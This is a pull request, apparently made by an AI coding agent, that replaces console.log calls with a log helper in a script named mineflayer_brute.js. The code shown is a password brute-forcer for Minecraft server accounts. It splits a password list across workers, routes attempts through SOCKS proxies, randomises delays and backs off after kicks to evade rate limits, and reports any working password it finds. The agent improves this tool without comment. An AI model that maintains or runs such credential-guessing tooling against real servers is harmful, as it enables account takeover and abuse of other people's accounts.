### PR TITLE
Replace console logging with log helper

### DIFF
--- a/mineflayer_brute.js
+++ b/mineflayer_brute.js
@@ -99,7 +99,7 @@ const allPasswords = fs.readFileSync('passwords.txt', 'utf8')
 // Distribute passwords among workers
 const passwords = allPasswords.filter((_, idx) => idx % workerCount === workerId);
 
-console.log(`Worker #${workerId}: Processing ${passwords.length} of ${allPasswords.length} passwords`);
+log(`Worker #${workerId}: Processing ${passwords.length} of ${allPasswords.length} passwords`, 'INFO');
 
 // Create logs directory if it doesn't exist
 if (!fs.existsSync('logs')) {
@@ -316,7 +316,7 @@ async function tryPassword(username, password, proxyUri) {
         botConfig.agent = new SocksProxyAgent(proxyUri);
     }
 
-    console.log('[DEBUG] Bot configuration:', JSON.stringify(botConfig, null, 2));
+    log(`Bot configuration: ${JSON.stringify(botConfig, null, 2)}`, 'DEBUG');
 
     try {
         const bot = mineflayer.createBot(botConfig);
@@ -335,19 +335,19 @@ async function tryPassword(username, password, proxyUri) {
 
             bot.once('error', (err) => {
                 clearTimeout(timeout);
-                console.log('[ERROR] Bot error:', err.message);
+                log(`Bot error: ${err.message}`, 'ERROR');
                 resolve('error');
             });
 
             bot.once('kicked', (reason) => {
                 clearTimeout(timeout);
-                console.log('[INFO] Bot kicked:', reason);
+                log(`Bot kicked: ${reason}`, 'INFO');
                 resolve('kicked');
             });
         });
     } catch (err) {
-        console.log('[ERROR] Error creating bot:', err.message);
-        console.log('[ERROR] Stack trace:', err.stack);
+        log(`Error creating bot: ${err.message}`, 'ERROR');
+        log(`Stack trace: ${err.stack}`, 'ERROR');
         return 'error';
     }
 }
@@ -386,13 +386,13 @@ async function main() {
         const result = await tryPassword(getNextTestAccount().username, password, proxyUri);
         
         if (result === 'success') {
-            console.log('\nFound working password:', password);
+            log(`\nFound working password: ${password}`, 'SUCCESS');
             break;
         } else if (result === 'kicked') {
-            console.log('Too many accounts detected, waiting for session timeout...');
+            log('Too many accounts detected, waiting for session timeout...', 'WARN');
             // Increase wait time based on consecutive failures
             const waitTime = config.sessionTimeout + (state.accountStates[getNextTestAccount().username].consecutiveFailures * 60000); // Add 1 minute per failure
-            console.log(`Waiting ${(waitTime/1000).toFixed(1)} seconds (increased due to consecutive failures)...`);
+            log(`Waiting ${(waitTime/1000).toFixed(1)} seconds (increased due to consecutive failures)...`, 'WAIT');
             await new Promise(resolve => setTimeout(resolve, waitTime));
             state.accountStates[getNextTestAccount().username].lastSessionEnd = Date.now();
             state.currentAttempt--; // Retry the same password after waiting
@@ -403,7 +403,7 @@ async function main() {
             // Add randomization to delay
             const baseDelay = config.delayBetweenAttempts.min;
             const randomDelay = baseDelay + Math.random() * (config.delayBetweenAttempts.max - baseDelay);
-            console.log(`Waiting ${(randomDelay/1000).toFixed(1)} seconds before next attempt...`);
+            log(`Waiting ${(randomDelay/1000).toFixed(1)} seconds before next attempt...`, 'WAIT');
             await new Promise(resolve => setTimeout(resolve, randomDelay));
         }
         


### PR DESCRIPTION
## Summary
- switch console.log calls to centralized `log` function in mineflayer_brute.js

## Testing
- `npm test` *(fails: no test specified)*

------
https://chatgpt.com/codex/tasks/task_e_684315bf7ba08327b393557348664f1f